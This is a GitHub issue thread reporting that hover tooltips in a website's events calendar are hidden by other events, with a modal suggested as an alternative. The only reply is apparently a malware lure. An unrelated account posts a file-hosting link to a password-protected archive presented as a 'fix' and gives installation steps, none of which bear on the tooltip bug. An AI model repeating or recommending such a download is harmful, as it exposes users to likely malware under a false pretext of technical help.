### ISSUE TITLE
Events Calendar View: either fix hover tooltip or add modal with additional information on click

### ISSUE THREAD

**Issue by jstet** [CorrelAid/correlaid_website#788]
Tooltip is blocked by other events. Alternative would be a modal

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
